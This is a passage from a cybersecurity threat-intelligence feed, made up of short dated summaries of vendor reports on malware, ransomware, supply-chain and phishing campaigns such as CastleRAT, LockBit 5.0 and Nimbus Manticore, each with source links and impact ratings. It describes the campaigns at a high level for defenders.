Summary:: Researchers at PolySwarm have identified CastleRAT, a newly documented remote access trojan deployed by the threat actor TAG-150 since March 2025. The group operates a multi-tiered command-and-control infrastructure and uses CastleLoader as an entry point to deliver secondary payloads, including CastleBot and CastleRAT. The malware exists in Python and C variants, with the latter enabling advanced surveillance features such as keylogging and screen capture. TAG-150 relies on phishing lures themed around Cloudflare “ClickFix” pages and fraudulent GitHub repositories, achieving high infection success rates among targeted users. The ecosystem is supported by public services for anti-detection and file sharing, highlighting adaptability and operational maturity. Targeting has primarily focused on organizations in the United States, with evidence suggesting potential links to ransomware operations, though attribution remains unconfirmed.

Source: https://blog.polyswarm.io/castlerat

Intel Source:: Polyswarm

Intel Name:: Nimbus_Manticore_Espionage_Ops_in_Europe_and_ME

Date of Scan:: 2025-09-30

Impact:: HIGH

Summary:: Researchers at PolySwarm have identified ongoing cyberespionage activity attributed to the Iranian state-linked threat group Nimbus Manticore, also known as Smoke Sandstorm or UNC1549. Since early 2025, the group has expanded operations against defense manufacturing, aerospace, telecommunications, satellite providers, and airlines across Western Europe and the Middle East. Its campaigns rely on spear-phishing emails impersonating HR recruiters, which lure victims to fraudulent career portals built with React templates and often deliver malicious payloads via Cloudflare-masked infrastructure. Nimbus Manticore employs two key malware families: MiniJunk, a heavily obfuscated backdoor capable of persistence, file manipulation, process execution, and covert command-and-control communications; and MiniBrowse, a lightweight stealer focused on harvesting browser credentials and exfiltrating data through JSON payloads. The group further strengthens operational security through DLL sideloading, certificate signing from trusted authorities, and resilient Azure-hosted C2 infrastructure.

Source: https://blog.polyswarm.io/nimbus-manticores-evolving-cyberespionage-campaign

Intel Source:: Netskope

Intel Name:: Lumma_Stealer_Delivered_via_Nullsoft_Installer

Date of Scan:: 2025-09-30

Impact:: MEDIUM

Summary:: Researchers at Netskope uncovered a new campaign delivering Lumma Stealer through a Nullsoft (NSIS) installer that leverages the legitimate AutoIt runtime to execute a hidden script. It drops an obfuscated batch file that renames and launches AutoIt, which then interprets an embedded script to continue execution. The stealer employs several evasion tactics, including environment checks, anti-debugging delays, analysis blocks, and DLL unhooking to bypass security tools. It establishes persistence by adding a shortcut in the Windows Startup folder, then decrypts and decompresses its main payload directly in memory. Although C2 activity was not observed due to inactive servers, the behavior strongly aligns with known Lumma Stealer operations. Victim organizations identified across telecom, healthcare, banking, and marketing sectors worldwide.

Source: https://www.netskope.com/blog/beyond-signatures-detecting-lumma-stealer-with-an-ml-powered-sandbox

Intel Source:: Arctic Wolf

Intel Name:: SonicWall_VPN_Exploited_for_Rapid_Ransomware

Date of Scan:: 2025-09-30

Impact:: HIGH

Summary:: Researchers at Arctic Wolf Labs have identified a widespread ransomware campaign exploiting SonicWall SSL VPN appliances through CVE-2024-40766 and stolen credentials. The threat actors demonstrated rapid intrusion methods, progressing from initial access to full encryption in under an hour in many cases. Once inside networks, they moved laterally, harvested Active Directory credentials, and extracted secrets from Veeam backup databases. They deployed legitimate remote management tools such as RustDesk and AnyDesk, as well as Cloudflare Tunnel, to maintain persistence and control. To evade defenses, the actors employed user account control bypasses, DLL sideloading, and bring-your-own-vulnerable-driver techniques to disable security software. Data was staged with compression tools and exfiltrated via FTP before encryption. The ransomware payloads then targeted both Windows servers and virtualized environments, maximizing operational disruption.

Source: https://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/

Intel Source:: Socket

Intel Name:: Malicious_Rust_crates_Wallet_key_theft

Date of Scan:: 2025-09-29

Impact:: MEDIUM

Summary:: Researchers at Socket have identified two typosquatted Rust crates, faster_log and async_println, that impersonate the legitimate fast_log logger. The rogue packages preserve normal logging functionality but embed code that recursively scans local Rust projects for Solana and Ethereum private keys as well as raw byte arrays resembling wallet seed phrases. Matched secrets, together with file path and line context, are packaged into a JSON payload and silently exfiltrated via an HTTPS POST to a hard coded endpoint masquerading as a blockchain RPC service. Because the crates are pure Rust, the malicious logic executes on Linux, macOS and Windows wherever a Rust compiler is present, including developer laptops and CI pipelines. Download statistics show 8,424 pulls between 25 May 2025 and takedown, demonstrating measurable exposure.

Source: https://socket.dev/blog/two-malicious-rust-crates-impersonate-popular-logger-to-steal-wallet-keys?utm_medium=feed

Intel Source:: Any.Run

Intel Name:: Tycoon2FA_Targets_UK_Telecoms

Date of Scan:: 2025-09-29

Impact:: MEDIUM

Summary:: Researchers at ANY.RUN have uncovered a large-scale phishing campaign targeting UK telecommunications companies through the Tycoon2FA phishing kit. The Attackers distribute spoofed DocuSign-style emails containing PDF attachments that entice recipients into clicking a Review and Sign button. Victims are then redirected to fraudulent Microsoft 365 login pages designed to bypass two-factor authentication and steal credentials. The campaign primarily targets a major British telecom group operating in 180 countries, but spill-over into media companies has also been observed. By compromising cloud identities, attackers gain persistent access that could enable data theft, lateral movement, and potentially disrupt communications services.

Source: https://any.run/cybersecurity-blog/fighting-telecom-attacks-with-anyrun/

Intel Source:: Fortinet

Intel Name:: SVG_Phishing_Campaign_Targets_Ukraine

Date of Scan:: 2025-09-29

Impact:: MEDIUM

Summary:: FortiGuard researchers have uncovered a phishing campaign targeting Ukraine that masquerades as the National Police of Ukraine. Victims receive malicious SVG attachments that lead to the download of a password-protected archive containing a CHM file. The CHM file executes an HTA-based loader, known as CountLoader, which establishes communication with a C2 server, gathers system details, and facilitates the delivery of additional malware. The campaign primarily deploys two payloads: PureMiner – a stealthy .NET–based cryptominer that verifies system hardware capabilities before injecting itself into processes to mine cryptocurrency. It leverages encrypted communication and can remove its persistence mechanisms when instructed by the operators. Amatera Stealer – a Python-based infostealer that executes filelessly in memory. It harvests a wide range of data, including browser credentials, cookies, cryptocurrency wallets, Steam and Telegram data, as well as files specified by custom rules.

Source: https://www.fortinet.com/blog/threat-research/svg-phishing-hits-ukraine-with-amatera-stealer-pureminer

Intel Source:: ASEC

Intel Name:: Larva_25004_Signed_Messenger_Update_Malware

Date of Scan:: 2025-09-29

Impact:: HIGH

Summary:: Researchers at ASEC have identified Larva-25004, a North Korea-linked intrusion set that since at least August 2023 has targeted South Korean defense contractors, public enterprises, and government research institutes with spear-phishing emails carrying digitally signed droppers disguised as routine documents. The operators steal South Korean code-signing certificates to sign JSE, PIF, and SCR loaders, helping the payloads evade application-control and reputation checks. Beyond phishing, the group compromised internally hosted Bizbox Alpha messenger update servers and substituted the legitimate updater, turning routine software updates into a supply-chain infection vector that automatically delivers malware to connected workstations. Deployed toolsets include the custom backdoors HttpSpy, Memload, and HttpTroy, an InfoStealer module, and a proxy implant that together provide full remote control, credential harvesting, and data-exfiltration capability.

Source: https://asec.ahnlab.com/ko/90292/

Intel Source:: K7 Labs

Intel Name:: Moq_RAT_LNK_to_LOLBin_infection

Date of Scan:: 2025-09-28

Impact:: MEDIUM

Summary:: Researchers at K7 Security Labs have observed a Windows shortcut campaign that delivers a multi-stage Remote Access Trojan (RAT) named Moq through Discord-hosted lure files. The malicious .lnk silently invokes embedded PowerShell that fetches a compressed payload, extracts Moq.dll, and launches it via the native odbcconf.exe binary to bypass application controls. Once active, the malware disables AMSI and ETW telemetry, implants persistence under the current user’s Winlogon shell registry key, and calls a hard-coded command server for tasking. Operators can execute arbitrary PowerShell, capture screenshots, enumerate security products, and exfiltrate selected files to cloud storage, giving them durable hands-on-keyboard access. Telemetry cited in the report places early activity in Israel, though no specific industry verticals are named. The reliance on built-in Windows utilities and in-memory patching significantly hampers traditional signature-based detection and complicates forensic reconstruction.

Source: https://labs.k7computing.com/index.php/from-lnk-to-rat-deep-dive-into-the-lnk-malware-infection-chain/

Intel Source:: Zscaler

Intel Name:: Zloader_Updated_Version

Date of Scan:: 2025-09-28

Impact:: MEDIUM

Summary:: Zscaler researchers have identified a new, advanced variant of the Zloader trojan, a malware family originally derived from Zeus that resurfaced in late 2023. The latest versions not only steal data but also function as an initial-access broker, providing ransomware operators with entry into compromised corporate Windows systems. Zloader employs multiple layers of code obfuscation, performs sandbox checks, and installs itself with lower privileges to remain stealthy. Its C2 communications have also evolved, leveraging custom DNS tunneling with encryption and, in some cases, WebSockets to blend in with normal HTTPS traffic. Configuration data is stored in a compact JSON block that supports flexible DNS resolution, while new commands enable Active Directory reconnaissance to facilitate lateral movement.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-zloader-updates

Intel Source:: Zscaler

Intel Name:: YiBackdoor_IcedID_Linked_Windows_Backdoor

Date of Scan:: 2025-09-28

Impact:: MEDIUM

Summary:: Researchers at Zscaler ThreatLabz have identified YiBackdoor, a newly emergent Windows malware first seen in June 2025 that re-uses code from the IcedID and Latrodectus families. The backdoor maintains persistence through registry Run keys and injects into a core Windows host process to conceal its presence. After launch, it performs system reconnaissance, captures screenshots, and executes arbitrary CMD or PowerShell tasks delivered over an encrypted HTTP(S) channel secured with daily-rotating TripleDES keys. Basic anti-analysis safeguards—hypervisor checks, API hashing, and on-demand string decryption—help it evade commodity sandboxes. A plugin architecture enables run-time feature expansion, underscoring its role as a modular post-exploitation platform reminiscent of ransomware loaders. Code-reuse overlaps observed by ThreatLabz imply a shared developer or tooling exchange within the IcedID ecosystem.

Source: https://www.zscaler.com/blogs/security-research/yibackdoor-new-malware-family-links-icedid-and-latrodectus

Intel Source:: Microsoft

Intel Name:: AI_Based_Credential_Phishing_Campaign

Date of Scan:: 2025-09-27

Impact:: MEDIUM

Summary:: Microsoft researchers uncovered a phishing campaign that used AI-generated code to hide malicious logic inside SVG file attachments sent through email. The attackers exploited a compromised Microsoft 365 account belonging to a small business and used a self-addressed/BCC trick to bypass basic security filters. When opened in a browser, the SVG executed hidden JavaScript that redirected victims through a CAPTCHA page, collected device fingerprints, and attempted to steal login credentials. Microsoft’s Security Copilot identified that the script is unusual, business-style coding pattern generated by LLM, which made it harder for security tools to detect. Although Microsoft Defender for Office 365 blocked the campaign early, a successful compromise could have enabled business email compromise, internal phishing, and data theft.

Source: https://www.microsoft.com/en-us/security/blog/2025/09/24/ai-vs-ai-detecting-an-ai-obfuscated-phishing-campaign/

Intel Source:: Huntress

Intel Name:: A_Evolution_to_PureRAT

Date of Scan:: 2025-09-27

Impact:: HIGH

Summary:: Huntress researchers have observed a tactical shift by a Vietnamese threat actor from developing custom Python-based infostealers to deploying the commodity malware known as PureRAT. The campaign begins with spearphishing emails that deliver ZIP archives containing both benign and malicious files, leveraging DLL sideloading and obfuscated Python loaders. The attackers demonstrate strong technical proficiency, chaining multiple staged payloads that transition from Python loaders to compiled .NET malware, ultimately delivering PureRAT. This RAT provides full remote control of compromised systems, including persistence, surveillance via webcams and microphones, keystroke logging, credential and cryptocurrency theft, and data exfiltration over Telegram, linked to the handle @LoneNone and Vietnamese-hosted C2 servers—indicators that align with activity previously associated with PXA Stealer.

Source: https://www.huntress.com/blog/purerat-threat-actor-evolution

Intel Source:: Socket

Intel Name:: Malicious_Fezbox_NPM_Package

Date of Scan:: 2025-09-27

Impact:: MEDIUM

Summary:: Socket Researchers have identified a malicious npm package called Fezbox, operating under the alias Jandeu, which embeds a backdoor within its compiled JavaScript code. The package downloads a QR-code image that actually contains an executable payload which is decoded and executed after a 120-second delay. Once activated, the payload collects usernames and passwords from browser cookies and exfiltrates them to a hard-coded HTTPS server. The attacker employed multiple obfuscation techniques such as string reversal, heavy minification, and QR-code steganography to avoid detection and sandboxing. Fezbox is still available in the public registry, any developer who installs it can accidentally bake the backdoor into production code, enabling account takeover and lateral movement across SaaS and corporate systems.

Source: https://socket.dev/blog/malicious-fezbox-npm-package-steals-browser-passwords-from-cookies-via-innovative-qr-code?utm_medium=feed

Intel Source:: Point Wild

Intel Name:: Raven_Stealer_Telegram_Credential_Theft

Date of Scan:: 2025-09-27

Impact:: MEDIUM

Summary:: Researchers at Point Wild have observed Raven Stealer, a Delphi/C++ information-stealing malware that exfiltrates browser credentials, cookies, payment details and screenshots through the Telegram Bot API. The malware’s GUI builder embeds operator-supplied Chat ID and Bot Token values into each stub, creating uniquely named payloads that evade signature-based detection (p.5). On launch, the stub decrypts a ChaCha20-protected DLL in memory, spawns a suspended Chromium process and performs reflective hollowing to execute its payload invisibly (p.10). The active implant enumerates Chromium-based browsers, decrypts stored passwords and payment data, stages them under %Local%\RavenStealer, compresses the haul and transmits it via Telegram in near-real time (pp.10-12). Operating entirely in user space, Raven Stealer needs no privilege escalation and leaves few artefacts beyond its loot, hampering post-incident forensics.

Source: https://www.pointwild.com/threat-intelligence/raven-stealer

Intel Source:: Trend Micro

Intel Name:: LockBit_5_0_Targets_Windows_Linux_and_ESXi

Date of Scan:: 2025-09-26

Impact:: HIGH

Summary:: Trend Micro researchers have identified that LockBit has released version 5.0, expanding its ransomware to Windows, Linux, and VMware ESXi systems. The new version builds on earlier features but adds stronger obfuscation and anti-forensic techniques. This version retains previous capabilities while introducing enhanced obfuscation and anti-forensic measures. On Windows, it employs a packed loader that decrypts the payload directly in memory, complicating static analysis. After encrypting files, it assigns random 16-character extensions, delivers the standard ransom note, patches logging functions, and clears event logs to hinder detection. It avoids execution on systems using Russian language or geolocation. The Linux variant works similarly to the Windows version and generates detailed logs, while the ESXi variant includes virtualization-specific options that allow attackers to impact multiple virtual machines on a single host.

Source: https://www.trendmicro.com/en_us/research/25/i/lockbit-5-targets-windows-linux-esxi.html

Intel Source:: G-Data

Intel Name:: BlockBlasters_Patch_Trojan

Date of Scan:: 2025-09-26

Impact:: HIGH

Summary:: Researchers at G DATA have discovered that a malicious update for the newly released Steam game BlockBlasters is distributing a Windows-based infostealer and backdoor. The August 30 patch was altered to include a batch script that steals Steam credentials, browser data, and crypto-wallet files, then uploads them to an attacker-controlled server. The update also drops additional payloads through password-protected archives and VBS launchers, including a Python-compiled remote-control tool and a StealC-based credential stealer. To evade detection, the script disables Microsoft Defender scanning for the payload folder and looks for running antivirus processes. The compromised patch has already reached hundreds of players, giving attackers persistent access to affected machines and enabling large-scale credential theft and potential account takeovers.

Source: https://www.gdatasoftware.com/blog/2025/09/38265-steam-blockblasters-game-downloads-malware

Intel Source:: Silent Push

Intel Name:: CountLoader_Triple_Variant_Malware_Loader

Date of Scan:: 2025-09-25

Impact:: HIGH

Summary:: Researchers at Silent Push have identified CountLoader, a newly observed malware loader that is released in three distinct builds (.NET, PowerShell and JScript) to facilitate ransomware operations. The toolset fingerprints infected hosts, establishes encrypted command-and-control channels through rotating infrastructure and then pulls secondary payloads such as Cobalt Strike, AdaptixC2 and HVNC to expand attacker control. It persists by creating a fraudulent Google Update scheduled task alongside a registry Run key, ensuring code retrieval on every reboot. Variant-specific kill-switch logic and bespoke string obfuscation show active development and operator agility. Telemetry in the report links the activity to Russian-language affiliate crews and highlights phishing lures aimed at Windows domain-joined systems as well as individuals in Ukraine.

Source: https://www.silentpush.com/blog/countloader/?utm_source=rss&utm_medium=rss&utm_campaign=countloader

Intel Source:: Google Cloud

Intel Name:: BRICKSTORM_Backdoor

Date of Scan:: 2025-09-25

Impact:: HIGH

Summary:: Google researchers have uncovered that the threat actor UNC5221 is conducting a long-running campaign leveraging a customized BRICKSTORM backdoor to maintain covert access within victim environments The operators achieve initial access by zero-day vulnerabilities in internet-facing edge appliances and VMware vCenter servers, then moves on to credential harvesting and manual lateral movement. Once established, BRICKSTORM operates as a full-featured SOCKS proxy, enabling the attackers to exfiltrate sensitive emails and virtual machine data without raising standard monitoring alerts. The campaign primarily targets U.S. tech firms and law practices, deploying malware that works across Linux, Windows, and VMware systems. Their tactics include escalating to domain administrator privileges, abusing vSphere APIs, and executing malware on devices that often lack security monitoring. If not stopped, this could lead to the theft of valuable intellectual property and sensitive legal communications.

Source: https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign

Intel Source:: Recorded Future

Intel Name:: RedNovember_Espionage_Campaign

Date of Scan:: 2025-09-25

Impact:: HIGH

Summary:: Researchers from Recorded Future have uncovered a cyber-espionage campaign conducted by the Chinese state-sponsored group RedNovember (also known as Storm-2077 and formerly TAG-100). Since mid-2024, the group has been exploiting vulnerabilities in widely used VPNs and network appliances including Ivanti, SonicWall, Cisco, F5, Palo Alto, Sophos, and Fortinet to compromise high-value targets. Once inside, they deploy tools such as the open-source Pantegana backdoor, Cobalt Strike, and SparkRAT, while concealing their activity through commercial VPN services like ExpressVPN. Their victims include government ministries, defense and aerospace contractors, space research centres, law firms, and professional-services firms, with confirmed breaches at U.S. defense contractors, a European engine manufacturer, and several diplomatic organizations. RedNovember’s operations have primarily targeted on the U.S., Taiwan, South Korea, and over 30 Panamanian government entities, often aligning with China’s strategic interests. By leveraging off-the-shelf tools and exploiting edge devices, the group has achieved global reach while making attribution more difficult, posing a significant risk of sensitive government and defense data theft.

Source: https://www.recordedfuture.com/research/rednovember-targets-government-defense-and-technology-organizations

Intel Source:: Darktrace

Intel Name:: ShadowV2_Botnet

Date of Scan:: 2025-09-24

Impact:: MEDIUM

Summary:: Researchers at Darktrace have uncovered ShadowV2, a container-based botnet that operates as a paid service. The malware distributed by hijacking misconfigured Docker daemons through a Python script, then deploys a Go-based RAT inside new containers to establish persistent control. Its operators manage the botnet via a public REST API that provides full functionality, including user creation and attack orchestration. Once activated, the botnet can launch powerful HTTP flood and HTTP/2 rapid-reset attacks, capable of bypassing protections such as Cloudflare’s under-attack mode. Honeypot analysis shows that the malware rapidly replicates its tools within containers, minimizing forensic artefacts and accelerating propagation. The campaign mainly targets cloud servers with exposed Docker services, , indicating largely opportunistic rather than highly targeted attacks.

Source: https://www.darktrace.com/blog/shadowv2-an-emerging-ddos-for-hire-botnet

Intel Source:: 360 Threat Intelligence Center

Intel Name:: OceanLotus_Deploys_Stealthy_Havoc_RAT_Loader

Date of Scan:: 2025-09-24

Impact:: MEDIUM

Summary:: Researchers at the 360 Threat Intelligence Center have attributed a recent cyber campaign to APT-C-00, also known as OceanLotus, involving the use of a custom DLL loader to covertly deploy the Havoc remote-access Trojan (RAT). The malware sample, compiled with Mingw-w64 and consistent with OceanLotus tooling, currently evades all antivirus detections. It uses runtime API hashing, creates a mutex to ensure a single instance, and achieves persistence by writing its command line to the HKCU...\Run registry key. The loader then performs module hollowing on certmgr.dll and reflectively injects the Havoc RAT shellcode. Once active, Havoc enables full remote command execution, granting the attacker post-exploitation control and data collection capabilities. These tactics, such as in-memory execution, registry-based persistence, and stealthy deployment—leave minimal forensic traces, significantly raising the risk of credential theft and data exfiltration. While no destructive behavior has been observed, the techniques and tooling align with OceanLotus’s history of targeting government and business entities in East Asia.

Source: https://mp.weixin.qq.com/s/zZVmDDWHQx7XuJZ8YO6joA

Intel Source:: CISA

Intel Name:: CVE_2024_36401_GeoServer_Compromise

Date of Scan:: 2025-09-24

Impact:: MEDIUM

Summary:: CISA researchers identified that threat actors compromised a U.S. federal civilian executive branch (FCEB) agency by exploiting the remote code execution vulnerability CVE-2024-36401 in two public-facing GeoServer instances. Their objective was to establish persistent access, conduct internal pivoting, and deploy C2 infrastructure. After initial exploitation, the attackers installed the open-source proxy tool Stowaway, deployed web shells and scheduled tasks for persistence, and moved laterally from GeoServer to a Microsoft SQL Server. They also harvested credentials through brute-force techniques and attempted privilege escalation on Linux hosts using the Dirty Cow exploit. The activity remained undetected for nearly three weeks due to gaps in endpoint detection and response (EDR) alert review and the absence of protective controls on the public-facing web server. Although no destructive actions or confirmed data exfiltration were observed.

Source: https://www.cisa.gov/sites/default/files/2025-09/AA25_266A_advisory_cisa_shares_lessons_learned_from_ir_engagement.pdf

Intel Source:: GitLab

Intel Name:: BeaverTail_Distributed_with_ClickFix_Lure

Date of Scan:: 2025-09-23

Impact:: MEDIUM

Summary:: GitLab researchers identified a North Korea–linked campaign that delivers a newly compiled, multi-platform variant of the BeaverTail malware together alongside the InvisibleFerret RAT. The threat actor leverages a deceptive ClickFix workflow hosted on cloned recruiting sites and trick people to target marketing, sales, and crypto traders as well as developer for running OS-specific shell commands that retrieve and execute bundled payloads from attacker infrastructure. The self-contained binaries enabling execution on macOS, Windows, and Linux, exfiltrate browser credentials and cryptocurrency wallet data, and deploy InvisibleFerret to give interactive remote access for further exploitation. The malware incorporates header-based guardrails, string obfuscation, and other techniques that reduce static-detection rates and hinder sandbox and antivirus visibility.

Source: https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/#appendix-indicators-of-compromise

Intel Source:: Group IB

Intel Name:: MuddyWater_Deploys_Custom_Backdoors

Date of Scan:: 2025-09-23

Impact:: HIGH

Summary:: Group-IB researchers report that MuddyWater also known as Seedworm has been active since 2017 and believed to be linked to Iran’s Ministry of Intelligence and Security (MOIS) which focuses on espionage and disruptive objectives. Initally, the group used RMM tools in their operations but has recently shifted toward low-volume spearphishing attacks delivering custom malware families such as BugSleep, StealthCache, Phoenix, and the Fo0der loader. Their tactics include PowerShell-based loaders, multi-stage infection chains, and encrypted C2 traffic over non-standard endpoints, often hidden behind cloud services and bulletproof hosting. They target victims in multiple sectors including telecommunications, government, defense, energy, and other critical infrastructure sectors across the Middle East, Europe, and the U.S. The group demonstrates strong capabilities for long-term persistence, data theft, and lateral movement using both custom-built and publicly available tools. They also employ evasion techniques such as delayed execution, multi-stage loaders, and the use of Windows Alternate Data Streams.

Source: https://www.group-ib.com/blog/muddywater-infrastructure-malware/

Intel Source:: CERT-AGID

Intel Name:: Fake_Docs_RMM_Tool_Abuse_for_Access

Date of Scan:: 2025-09-22

Impact:: MEDIUM

Summary:: Researchers at CERT-AGID have identified a phishing campaign leveraging fake document sharing emails to deliver a malicious installer for a legitimate remote management tool. The operation begins with English-language lures redirecting recipients to a fraudulent Microsoft Outlook login page designed to validate and capture email credentials. Upon verification, victims are prompted to download and execute an installer that deploys the PDQConnect agent, granting attackers persistent remote access. The activity is assessed as originating from Initial Access Brokers, whose intent is to harvest credentials and establish footholds for resale to other threat actors. By exploiting free trial registrations of commercial RMM software, adversaries avoid financial barriers and rotate accounts as trials expire, ensuring uninterrupted operations.

Source: https://cert-agid.gov.it/news/campagna-malware-abusa-di-strumenti-di-rmm-legittimi-tramite-falsa-condivisione-di-documenti/

Intel Source:: Zscaler

Intel Name:: SilentSync_RAT_Malicious_PyPI_Supply_Chain

Date of Scan:: 2025-09-22

Impact:: MEDIUM

Summary:: Researchers at Zscaler ThreatLabz have identified two typo-squatted Python Package Index (PyPI) libraries named sisaws and secmeasure that clandestinely deliver SilentSync, a custom Python remote-access trojan. The packages masquerade as benign developer utilities and, during installation, execute embedded scripts that fetch and run the malware. Once active, SilentSync establishes persistence, connects to attacker command-and-control infrastructure, and awaits tasks. The trojan supports remote shell access, file and directory exfiltration, screenshot capture, and Chromium or Firefox credential harvesting, granting broad operational control over infected hosts. Although the current infection chain weaponises only the Windows platform, SilentSync contains code for Linux and macOS persistence, indicating plans to expand its reach. Victimology is presently limited to developers and continuous-integration systems that import the malicious libraries, but compromise can cascade to downstream consumers of the affected software.

Source: https://www.zscaler.com/blogs/security-research/malicious-pypi-packages-deliver-silentsync-rat

Intel Source:: Acronis

Intel Name:: New_FileFix_Campaign

Date of Scan:: 2025-09-20

Impact:: MEDIUM

Summary:: Researchers at Acronis have uncovered a new phishing campaign in which attackers are leveraging FileFix, a variant of the ClickFix social-engineering toolkit, to conduct large-scale credential theft. The operation begins with a fraudulent Facebook Security page that deceives victims into executing a PowerShell command. This command covertly launches a multistage loader concealed within a JPEG image through steganography. The loader progressively unpacks and executes additional payloads, ultimately installing the Stealc infostealer. Stealc is designed to harvest browser credentials, cryptocurrency wallets, gaming accounts, and other sensitive information, which is then exfiltrated to attacker-controlled Bitbucket repositories. To evade detection, the campaign employs advanced obfuscation techniques, including JavaScript and PowerShell manipulation, XOR encoding, and domain generation. Activity has been observed across multiple countries, indicating broad, opportunistic targeting rather than a focus on specific sectors.

Source: https://www.acronis.com/en/tru/posts/filefix-in-the-wild-new-filefix-campaign-goes-beyond-poc-and-leverages-steganography/

Intel Source:: Lumen

Intel Name:: SystemBC_Botnet

Date of Scan:: 2025-09-19

Impact:: MEDIUM

Summary:: Researchers at Black Lotus identified that the SystemBC botnet has grown significantly, now operating more than 80 C2 servers and 1,500 active infected machines each day. The malware installs a SOCKS5 proxy on compromised Windows and Linux systems, enabling attackers to conceal their traffic and deliver additional payloads, often linked to ransomware campaigns where it creates encrypted channels for control and data exfiltration. Most infected hosts are commercial VPS servers, providing the botnet with high-bandwidth, low-noise infrastructure compared to residential devices. The botnet is monetized by reselling proxy bandwidth to spammers and phishers while keeping premium nodes for high-value operations such as credential theft and ransomware distribution. The infrastructure is global notable ties to Russian and Vietnamese proxy services.

Source: https://blog.lumen.com/systembc-bringing-the-noise/?utm_source=rss&utm_medium=rss&utm_campaign=systembc-bringing-the-noise

Intel Source:: Zscaler

Intel Name:: A_New_Variants_SmokeLoader

Date of Scan:: 2025-09-19

Impact:: MEDIUM

Summary:: Zscaler researchers have identified two new versions of the long-running SmokeLoader malware, named 2025 alpha and 2025. Active since 2011, SmokeLoader is primarily used to install other malware such as trojans, ransomware, and information stealers, while also offering plugins for credential theft, browser hijacking, DDoS attacks, and cryptocurrency mining. The latest versions address longstanding bugs, improve stability, and incorporate advanced evasion techniques, including code obfuscation, virtual machine checks, and on-demand decryption. Version 2025 further updates the communication protocol with its servers, introduces checksums, and modifies scheduled-task and file names, rendering it incompatible with earlier variants. Both versions terminate if a Russian keyboard layout is detected, suggesting ties to Russian-speaking operators. At present, many threat actors continue to use the alpha build due to its compatibility with older systems, but adoption of version 2025 is expected to increase as migration progresses.

Source: https://www.zscaler.com/blogs/security-research/smokeloader-rises-ashes

Intel Source:: ASEC

Intel Name:: BlackLock_RaaS_Cross_Platform_Go_Locker

Date of Scan:: 2025-09-19

Impact:: HIGH

Summary:: Researchers at ASEC have observed BlackLock, a Russian-language ransomware-as-a-service operation that surfaced in early 2024 after rebranding from El Dorado. The crew aggressively recruits affiliates on underground forums and advertises a Go-written locker capable of running on Windows, Linux and VMware ESXi systems. BlackLock uses the go-smb2 library to traverse network shares, encrypting both local and remote files with XChaCha20 while wrapping keys via ECDH, which greatly complicates decryption. After completing encryption, the malware deletes Volume Shadow Copies through in-memory COM shellcode, blocking straightforward restoration paths. Victim reporting shows compromises across U.S. public agencies, manufacturing, consulting, education, transportation and leisure sectors, with additional incidents in South Korea and Japan.

Source: https://asec.ahnlab.com/en/90175/

Intel Source:: Securelist

Intel Name:: RevengeHotels_VenomRAT_Hits_LatAm_Hospitality

Date of Scan:: 2025-09-18

Impact:: HIGH

Summary:: Researchers at Securelist have observed RevengeHotels (aka TA558) launching a refreshed phishing campaign against hospitality targets in Latin America. Invoice- and job-application themed emails deliver JavaScript loaders that appear to be generated by large language-model tools, indicating iterative automation. The loaders invoke staged PowerShell scripts that retrieve and execute VenomRAT completely in memory. VenomRAT grants attackers remote desktop control, credential harvesting, file theft, and USB self-propagation. It also installs ngrok to expose RDP or VNC services through encrypted tunnels, broadening attacker reach. Defensive measures are hampered as the malware disables Windows Defender, terminates analysis utilities, and wipes Windows event logs. Current lures in Portuguese and Spanish suggest an operational expansion from Brazil into Argentina, Mexico, Chile, Costa Rica, Bolivia, and Spain. The operation’s objective remains theft of guest payment-card data and reservation records, directly impacting hotel revenue and customer trust.

Source: https://securelist.com/revengehotels-attacks-with-ai-and-venomrat-across-latin-america/117493/

Intel Source:: Sophos

Intel Name:: Warlock_Ransomware

Date of Scan:: 2025-09-18

Impact:: HIGH

Summary:: Sophos researchers have identified a new ransomware operation dubbed the Warlock Group also tracked as GOLD SALEM and Storm-2603. The threat actors target organizations of all sizes across North and South America and Europe, from small businesses and government entities to large enterprises. After exploiting vulnerabilities in platforms such as SharePoint, they deploy a custom Golang backdoor to establish remote control, extract credentials from memory, and move laterally with tools like PsExec and Impacket. The attackers use a “bring-your-own-vulnerable-driver” technique to disable security products, terminating EDR agents before deploying their Warlock ransomware. Adopting a double-extortion model, they both encrypt data and threaten to publish stolen files on a Tor-hosted leak site. Recent underground-forum advertisements seeking exploits and affiliates suggest the group is evolving toward a ransomware-as-a-service model.

Source: https://news.sophos.com/en-us/2025/09/17/gold-salems-warlock-operation-joins-busy-ransomware-landscape/

Intel Source:: Cyfirma

Intel Name:: XillenStealer_A_Python_InfoStealer

Date of Scan:: 2025-09-18

Impact:: MEDIUM

Summary:: Researchers from Cyfirma have identified XillenStealer, a new Python-based, open-source information stealer published on GitHub by an author using the alias Bengaminattion. The toolkit includes a builder that allows low-skilled actors to create custom binaries for Windows, Linux, and macOS for distribution. When executed, the malware collects host profile data, injects into explorer.exe to hide its activity, and harvests browser-stored credentials, cryptocurrency wallet keys, Discord tokens, and Telegram session files. Collected data are compressed, split if larger than 45 MB, and automatically exfiltrated to an operator-controlled Telegram bot. The campaign is linked to a Russian-language cyber-criminal ecosystem called Xillen Killers, which also advertises services such as DDoS and exploit offerings. Although XillenStealer is non-destructive, its modular design and public availability make it easy for other actors to weaponize, increasing the risk of widespread credential and crypto theft.

Source: https://www.cyfirma.com/research/unmasking-a-python-stealer-xillenstealer/

Intel Source:: Reliaquest

Intel Name:: ShinyHunters_Targets_Salesforce_Via_Phishing

Date of Scan:: 2025-09-18

Impact:: LOW

Summary:: ReliaQuest researchers have uncovered coordinated ticket-themed phishing campaigns conducted by ShinyHunters—a financially motivated group that re-emerged after about a year of silence, targeting Salesforce credentials at large enterprises. The group’s recent infrastructure and social-engineering lures closely resemble with Scattered Spider. Victims are tricked into approving malicious connected apps, enabling large-scale data exfiltration from Salesforce and related cloud repositories. Once inside, attackers move laterally via Citrix, VMware ESXi and VPN appliances, escalate privileges up to Azure Global Administrator and even relocated virtual machines to evade detection. The group is focusing more on finance, insurance and professional-services targets and hides its footprint using Cloudflare-masked nameservers, disposable registrant emails, and VPN obfuscation to complicate attribution and defense.

Source: https://reliaquest.com/blog/threat-spotlight-shinyhunters-data-breach-targets-salesforce-amid-scattered-spider-collaboration/

Intel Source:: Huntress

